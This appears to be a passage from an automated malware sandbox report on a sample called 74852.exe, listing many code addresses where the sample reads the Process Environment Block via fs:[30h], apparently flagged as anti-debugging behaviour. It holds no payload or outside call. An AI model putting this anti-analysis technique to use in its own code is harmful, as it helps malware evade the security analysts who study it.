          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]1_2_01423D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8D34 mov eax, dword ptr fs:[00000030h]1_2_014E8D34
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]1_2_0144513A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]1_2_0144513A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0149A537 mov eax, dword ptr fs:[00000030h]1_2_0149A537
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]1_2_01444D3B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov ecx, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]1_2_01496DC9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]1_2_0141B1E1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014A41E8 mov eax, dword ptr fs:[00000030h]1_2_014A41E8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]1_2_0142D5E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]1_2_0142D5E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]1_2_014DFDE2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]1_2_014DFDE2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]1_2_014DFDE2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]1_2_014DFDE2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014C8DF1 mov eax, dword ptr fs:[00000030h]1_2_014C8DF1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A185 mov eax, dword ptr fs:[00000030h]1_2_0144A185
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C182 mov eax, dword ptr fs:[00000030h]1_2_0143C182
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]1_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]1_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]1_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]1_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]1_2_01412D8A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]1_2_01412D8A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]1_2_01412D8A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]1_2_01412D8A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]1_2_01412D8A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442990 mov eax, dword ptr fs:[00000030h]1_2_01442990
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]1_2_0144FD9B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]1_2_0144FD9B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]1_2_014E05AC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]1_2_014E05AC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]1_2_014461A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]1_2_014461A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014435A1 mov eax, dword ptr fs:[00000030h]1_2_014435A1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014969A6 mov eax, dword ptr fs:[00000030h]1_2_014969A6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]1_2_01441DB5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]1_2_01441DB5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]1_2_01441DB5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]1_2_014951BE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]1_2_014951BE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]1_2_014951BE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]1_2_014951BE
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A44B mov eax, dword ptr fs:[00000030h]1_2_0144A44B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]1_2_01430050
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]1_2_01430050
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]1_2_014AC450
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]1_2_014AC450
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143746D mov eax, dword ptr fs:[00000030h]1_2_0143746D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1074 mov eax, dword ptr fs:[00000030h]1_2_014E1074
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D2073 mov eax, dword ptr fs:[00000030h]1_2_014D2073
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]1_2_014E740D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]1_2_014E740D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]1_2_014E740D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]1_2_01496C0A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]1_2_01496C0A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]1_2_01496C0A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]1_2_01496C0A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]1_2_014D1C06
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]1_2_014E4015
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]1_2_014E4015
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]1_2_01497016
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]1_2_01497016
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]1_2_01497016
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]1_2_0142B02A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]1_2_0142B02A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]1_2_0142B02A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]1_2_0142B02A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144BC2C mov eax, dword ptr fs:[00000030h]1_2_0144BC2C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]1_2_0144002D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]1_2_0144002D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]1_2_0144002D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]1_2_0144002D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]1_2_0144002D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8CD6 mov eax, dword ptr fs:[00000030h]1_2_014E8CD6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov ecx, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]1_2_014AB8D0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014158EC mov eax, dword ptr fs:[00000030h]1_2_014158EC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D14FB mov eax, dword ptr fs:[00000030h]1_2_014D14FB
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]1_2_01496CF0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]1_2_01496CF0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]1_2_01496CF0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419080 mov eax, dword ptr fs:[00000030h]1_2_01419080
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]1_2_01493884
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]1_2_01493884
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142849B mov eax, dword ptr fs:[00000030h]1_2_0142849B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014590AF mov eax, dword ptr fs:[00000030h]1_2_014590AF
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov ecx, dword ptr fs:[00000030h]1_2_0144F0BF
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]1_2_0144F0BF
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]1_2_0144F0BF
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141DB40 mov eax, dword ptr fs:[00000030h]1_2_0141DB40
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142EF40 mov eax, dword ptr fs:[00000030h]1_2_0142EF40
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8B58 mov eax, dword ptr fs:[00000030h]1_2_014E8B58
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141F358 mov eax, dword ptr fs:[00000030h]1_2_0141F358
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141DB60 mov ecx, dword ptr fs:[00000030h]1_2_0141DB60
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142FF60 mov eax, dword ptr fs:[00000030h]1_2_0142FF60
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8F6A mov eax, dword ptr fs:[00000030h]1_2_014E8F6A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]1_2_01443B7A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]1_2_01443B7A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]1_2_014E070D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]1_2_014E070D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]1_2_0144A70E
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]1_2_0144A70E
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143F716 mov eax, dword ptr fs:[00000030h]1_2_0143F716
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D131B mov eax, dword ptr fs:[00000030h]1_2_014D131B
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]1_2_014AFF10
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]1_2_014AFF10
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]1_2_01414F2E
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]1_2_01414F2E
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144E730 mov eax, dword ptr fs:[00000030h]1_2_0144E730
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]1_2_014953CA
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]1_2_014953CA
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]1_2_014403E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143DBE9 mov eax, dword ptr fs:[00000030h]1_2_0143DBE9
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014537F5 mov eax, dword ptr fs:[00000030h]1_2_014537F5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D138A mov eax, dword ptr fs:[00000030h]1_2_014D138A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CD380 mov ecx, dword ptr fs:[00000030h]1_2_014CD380
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]1_2_01421B8F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]1_2_01421B8F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442397 mov eax, dword ptr fs:[00000030h]1_2_01442397
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144B390 mov eax, dword ptr fs:[00000030h]1_2_0144B390
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01428794 mov eax, dword ptr fs:[00000030h]1_2_01428794
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]1_2_01497794
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]1_2_01497794
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]1_2_01497794
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]1_2_01444BAD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]1_2_01444BAD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]1_2_01444BAD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E5BA5 mov eax, dword ptr fs:[00000030h]1_2_014E5BA5
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]1_2_01419240
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]1_2_01419240
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]1_2_01419240
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]1_2_01419240
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]1_2_01427E41
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]1_2_014DAE44
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]1_2_014DAE44
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DEA55 mov eax, dword ptr fs:[00000030h]1_2_014DEA55
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014A4257 mov eax, dword ptr fs:[00000030h]1_2_014A4257
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]1_2_014CB260
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]1_2_014CB260
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8A62 mov eax, dword ptr fs:[00000030h]1_2_014E8A62
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142766D mov eax, dword ptr fs:[00000030h]1_2_0142766D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]1_2_0143AE73
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]1_2_0143AE73
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]1_2_0143AE73
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]1_2_0143AE73
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]1_2_0143AE73
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145927A mov eax, dword ptr fs:[00000030h]1_2_0145927A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]1_2_0141C600
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]1_2_0141C600
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]1_2_0141C600
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01448E00 mov eax, dword ptr fs:[00000030h]1_2_01448E00
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1608 mov eax, dword ptr fs:[00000030h]1_2_014D1608
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01428A0A mov eax, dword ptr fs:[00000030h]1_2_01428A0A
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]1_2_01415210
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov ecx, dword ptr fs:[00000030h]1_2_01415210
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]1_2_01415210
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]1_2_01415210
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]1_2_0141AA16
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]1_2_0141AA16
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]1_2_0144A61C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]1_2_0144A61C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01433A1C mov eax, dword ptr fs:[00000030h]1_2_01433A1C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141E620 mov eax, dword ptr fs:[00000030h]1_2_0141E620
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]1_2_01454A2C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]1_2_01454A2C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CFE3F mov eax, dword ptr fs:[00000030h]1_2_014CFE3F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01458EC7 mov eax, dword ptr fs:[00000030h]1_2_01458EC7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014436CC mov eax, dword ptr fs:[00000030h]1_2_014436CC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CFEC0 mov eax, dword ptr fs:[00000030h]1_2_014CFEC0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442ACB mov eax, dword ptr fs:[00000030h]1_2_01442ACB
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8ED6 mov eax, dword ptr fs:[00000030h]1_2_014E8ED6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014276E2 mov eax, dword ptr fs:[00000030h]1_2_014276E2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442AE4 mov eax, dword ptr fs:[00000030h]1_2_01442AE4
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014416E0 mov ecx, dword ptr fs:[00000030h]1_2_014416E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFE87 mov eax, dword ptr fs:[00000030h]1_2_014AFE87
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]1_2_0144D294
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]1_2_0144D294
